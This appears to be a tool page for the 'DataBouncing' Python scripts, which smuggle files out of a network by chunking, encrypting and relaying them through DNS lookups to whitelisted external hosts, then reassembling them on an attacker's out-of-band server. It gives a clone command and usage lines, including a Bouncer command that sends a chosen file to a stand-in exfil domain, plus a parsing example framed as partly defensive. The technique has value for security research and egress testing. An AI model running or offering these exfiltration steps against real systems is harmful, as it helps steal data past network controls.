Bouncing with Nick Dunn
When we were conceptualizing data bouncing, Nick rolled his sleeves up and put together the first set of reliable Python tools to get data out and rebuild it via data bouncing. This is achieved over four scripts; let's take a look: https://github.com/N1ckDunn/DataBouncing/tree/main
Recruiter.py
V0.2 Working PoC to check a list of hosts and their responses via the DNS bouncer.
Dentist.py
V1.1 Currently working and tested. Extracts the list of usable hosts from the DNS output.
Bouncer.py
V0.2 Working PoC for binary file transfer/exfiltration (see below). Further functionality to come.
TheTherapist.py
V0.2 Working PoC for reassembly of exfiltrated file (see below). Further functionality to come.
git clone https://github.com/N1ckDunn/DataBouncing.git
Using Recruiter.py
You provide a file containing potential targets to be assessed, and Recruiter will assess the viability of using them for data bouncing. The targets will be external domains that are whitelisted by the environment that you are planning to DataBounce from. After running Recruiter, the JSON output from interactsh can be passed to Dentist to extract usable hostnames.
Usage: python3 recruiter.py -o YOUR_OOB_DOMAIN_HERE -f domains.txt -v
Using Dentist.py
Extract a list of usable hosts from JSON data. It requires the exported JSON output of the DNS server, from running Recruiter against your list of hosts. It will extract the usable hostname from the "full-id" param, clipping the unwanted string from the end, ready for usage with Bouncer:
"unique-id":"ckji0gb5hom1mdsb8p7gmphu9ibe1sxoq","full-id":"www.host.apa.org.ckji0gb5hom1mdsb8p7gmphu9ibe1sxoq","
Usage: python3 dentist.py json_datafile
e.g.: python3 dentist.py input.json
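The clipping step described above, as an added example that is not Dentist.py's own code: it assumes the export holds one JSON object per line, the function names relayed_host and summarize are hypothetical, and the sample records use constructed hostnames and IDs. The per-host counts are also what a defender reviewing an allow-list needs to see which permitted hosts relayed a lookup.

```python
import json
from collections import Counter

# Constructed sample in the "unique-id"/"full-id" shape the page shows.
# Hostnames and IDs are made up; one object per line is an assumption.
SAMPLE_EXPORT = """\
{"protocol":"dns","unique-id":"abcd1234abcd1234","full-id":"www.allowed.example.abcd1234abcd1234"}
{"protocol":"dns","unique-id":"abcd1234abcd1234","full-id":"WWW.Allowed.Example.abcd1234abcd1234"}
{"protocol":"dns","unique-id":"abcd1234abcd1234","full-id":"cdn.partner.example.abcd1234abcd1234"}
{"protocol":"dns","unique-id":"abcd1234abcd1234","full-id":"abcd1234abcd1234"}
{"protocol":"http","unique-id":"abcd1234abcd1234"}
not json at all
"""

def relayed_host(record):
    """Return the hostname that precedes the unique-id in full-id, or None."""
    uid = record.get("unique-id")
    full = record.get("full-id")
    if not isinstance(uid, str) or not isinstance(full, str) or not uid:
        return None
    full = full.strip().rstrip(".").lower()   # DNS names are case-insensitive
    suffix = "." + uid.lower()
    if not full.endswith(suffix):
        return None   # bare callback: no hostname was prepended
    return full[: -len(suffix)] or None

def summarize(export_text):
    """Count interactions per relaying host; returns (Counter, skipped)."""
    hosts, skipped = Counter(), 0
    for line in export_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            skipped += 1   # truncated or non-JSON line in the export
            continue
        host = relayed_host(record) if isinstance(record, dict) else None
        if host is None:
            skipped += 1
        else:
            hosts[host] += 1
    return hosts, skipped

if __name__ == "__main__":
    hosts, skipped = summarize(SAMPLE_EXPORT)
    for host, count in hosts.most_common():
        print(f"{count:3d}  {host}")
    print(f"skipped {skipped} record(s)")
```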
Using Bouncer.py
Provide an exfil domain (a DNS server under your control), and a file that you wish to exfiltrate. The Bouncer will randomly choose a domain name to query, encrypt the file and send it in chunks to be prepended as part of the payload within the header, to be subsequently collected by the DNS server under your control.
You'll need to specify a unique ID that will be used to reassemble the file after smuggling.
Example cmd line input: python3 bouncer.py -e YOUR_OOB_DOMAIN_HERE -f your_filename.jpeg -u 5555 -v
Note that the exfil server named by the -e parameter above should match the server name copied from the interactsh web interface, or as named on the cmd line for the interactsh client. It should *not* match the full hostname in the interactsh client terminal output.
Using TheTherapist.py
When provided with JSON input from the DNS server, therapist extracts and reassembles the individual encrypted chunks, decrypts them and writes the output to a filename of your choosing.
Use the unique ID that you used during exfiltration.
Example cmd line input: python3 thetherapist.py -i your_output.json -o output_filename.jpeg -u 5555 -v